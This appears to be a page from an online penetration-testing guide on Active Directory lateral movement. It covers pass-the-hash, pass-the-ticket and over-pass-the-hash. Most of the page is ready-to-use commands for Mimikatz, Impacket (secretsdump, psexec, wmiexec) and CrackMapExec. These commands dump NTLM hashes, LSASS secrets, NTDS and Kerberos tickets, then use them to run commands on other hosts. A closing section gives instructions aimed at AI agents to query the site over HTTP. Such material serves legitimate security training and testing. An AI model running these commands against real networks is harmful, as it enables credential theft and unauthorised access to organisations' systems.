# Pass-the-?

## Pass-the-Hash (PtH) Attacks

#### NTLM Hash Overview

**Service Purpose**: NTLM hashes are used for authentication in Windows environments, especially for local and SMB authentication.

**Why Target NTLM Hashes**: These hashes can be used directly for authentication without needing to crack the plaintext password, enabling immediate lateral movement.

#### Pass-the-Hash Attack

**Purpose**: Use extracted NTLM hashes to authenticate to other systems without knowing the plaintext password.

**Requirements**: NTLM hash of user account, target systems accepting NTLM authentication 

**Attack Value**: Immediate access to systems, works even with strong passwords, bypasses password complexity

#### NTLM Hash Extraction

**Using Impacket Tools**

```bash
# Extract NTLM hashes from compromised system
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>

# Extract from specific registry hives
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -sam -security -system

# Extract cached credentials
python3 secretsdump.py <domain>/<username>:<password>@<target-IP> -cached
```

**Using Mimikatz (Windows)**

```powershell
# Extract from LSASS memory
mimikatz "privilege::debug" "sekurlsa::logonpasswords"

# Extract from SAM database
mimikatz "privilege::debug" "lsadump::sam"

# Extract cached credentials
mimikatz "privilege::debug" "lsadump::cache"
```

**Using CrackMapExec**

```bash
# Extract SAM hashes from multiple systems
crackmapexec smb <network-range> -u '<username>' -p '<password>' --sam

# Extract from domain controller
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds
```

#### Pass-the-Hash Execution

**Using Impacket Tools**

```bash
# SMB authentication with hash
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Remote command execution
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Access file shares
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>
```

**Using CrackMapExec**

```bash
# Pass-the-hash across network range
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash>

# Execute commands via PtH
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

# Dump additional credentials
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> --sam --lsa
```

***

## Pass-the-Ticket (PtT) Attacks

#### Kerberos Ticket Overview

**Service Purpose**: Kerberos tickets (TGT/TGS) are used for authentication in Active Directory environments, providing single sign-on capabilities.

**Why Target Kerberos Tickets**: Valid tickets can be extracted and reused on other systems to impersonate users without needing passwords or hashes.

#### Pass-the-Ticket Attack

**Purpose**: Extract and reuse Kerberos tickets to authenticate as other users on different systems.

**Requirements**: Valid Kerberos tickets (TGT or TGS), target systems in same domain&#x20;

**Attack Value**: User impersonation, session hijacking, privilege escalation

#### Kerberos Ticket Extraction

**Using Mimikatz (Windows)**

```powershell
# List current tickets
mimikatz "kerberos::list"

# Export all tickets
mimikatz "kerberos::list /export"

# Extract tickets from LSASS
mimikatz "privilege::debug" "sekurlsa::tickets /export"

# Target specific user's tickets
mimikatz "kerberos::list /user:<username> /export"
```

**Using Impacket Tools**

```bash
# Extract tickets using getTGT.py (if credentials known)
python3 getTGT.py <domain>/<username>:<password>

# Extract tickets from Windows system (requires local access)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>
```

#### Pass-the-Ticket Execution

**Cross-Platform Ticket Conversion**

```bash
# Convert Mimikatz tickets (.kirbi) to Unix format (.ccache)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

# Convert ccache to kirbi
python3 ticketConverter.py <ticket.ccache> <ticket.kirbi>
```

**Using Impacket Tools**

```bash
# Set ticket in environment
export KRB5CCNAME=<ticket.ccache>

# Use ticket for authentication (no password needed)
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
python3 smbclient.py <domain>/<username>@<target-server> -k -no-pass
python3 wmiexec.py <domain>/<username>@<target-server> -k -no-pass
```

**Using Mimikatz (Windows)**

```powershell
# Inject ticket into current session
mimikatz "kerberos::ptt <ticket.kirbi>"

# Use injected ticket
dir \\<target-server>\c$
psexec \\<target-server> cmd
```

***

## Over-Pass-the-Hash (Pass-the-Key)

#### Hybrid Authentication Overview

**Service Purpose**: Over-pass-the-hash leverages NTLM hashes to request Kerberos tickets, combining the benefits of both authentication methods.

**Why Use Over-Pass-the-Hash**: Enables Kerberos authentication using only NTLM hashes, providing better stealth and compatibility than pure NTLM authentication.

#### Over-Pass-the-Hash Attack

**Purpose**: Use NTLM hashes or AES keys to request Kerberos TGTs, then use those tickets for authentication.

**Requirements**: NTLM hash or AES key, access to domain controller for TGT request&#x20;

**Attack Value**: Stealth (uses Kerberos), bypasses NTLM restrictions, enables advanced Kerberos attacks

#### Over-Pass-the-Hash Execution

**Using Impacket Tools**

```bash
# Request TGT using NTLM hash
python3 getTGT.py <domain>/<username> -hashes :<NTLM-hash>

# Request TGT using AES key
python3 getTGT.py <domain>/<username> -aesKey <AES-key>

# Use obtained TGT
export KRB5CCNAME=<username>.ccache
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
```

**Using Mimikatz (Windows)**

```powershell
# Over-pass-the-hash with NTLM
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM-hash> /run:cmd"

# Over-pass-the-hash with AES256
mimikatz "sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES-key> /run:cmd"

# Request TGT in new session
# In the new cmd window:
klist  # Shows TGT after first Kerberos authentication attempt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://reaper.gitbook.io/my-penetration-test-guide/active-directory/lateral-movement/pass-the.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.